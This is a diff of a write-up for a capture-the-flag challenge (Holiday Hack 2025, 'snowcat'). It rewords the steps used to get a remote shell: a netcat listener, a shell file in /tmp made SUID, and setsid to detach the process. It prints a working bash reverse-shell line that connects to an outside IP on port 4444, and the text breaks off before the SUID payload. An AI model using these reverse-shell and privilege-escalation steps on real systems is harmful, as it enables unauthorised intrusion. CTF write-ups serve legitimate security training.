MitchDarrow/HHC_2025/act3_snowcat_mjd.md

 <br>
 </p>
 <p>
-To achieve a remote shell, the following approach was used:
+The next step is to achieve a remote shell access to the target system.
+The following is the approach:
 <br>
 </p>
 <ol>
 <li>Setup a linux machine in linode, and start a netcat listener on port 4444</li>
 <li>As the low level user, create a shell code in the /tmp directory</li>
 <li>Change permissions on the file to allow other users to access and execute</li>
-<li>Send a payload to set the SUID on the shell file</li>
+<li>Send a payload to set the SUID on the shell file, allowing it to run with elevated permissions</li>
 <li>Send a payload that uses setsid to detach the process completely from the invoking script and run the shell</li>
 </ol>
 <p>
-The shell file used was:
+The file contained the following code to create a shell.
 <br>
 </p>
 <pre><code class="language-sh">
 bash -i >& /dev/tcp/69.164.211.205/4444 0>&1
 </code></pre>
 <p>
-The payload used to set the SUID was:
+Next, the following payload sent that set the SUID of the shell file.
 <br>
 </p>
 <pre><code class="language-sh">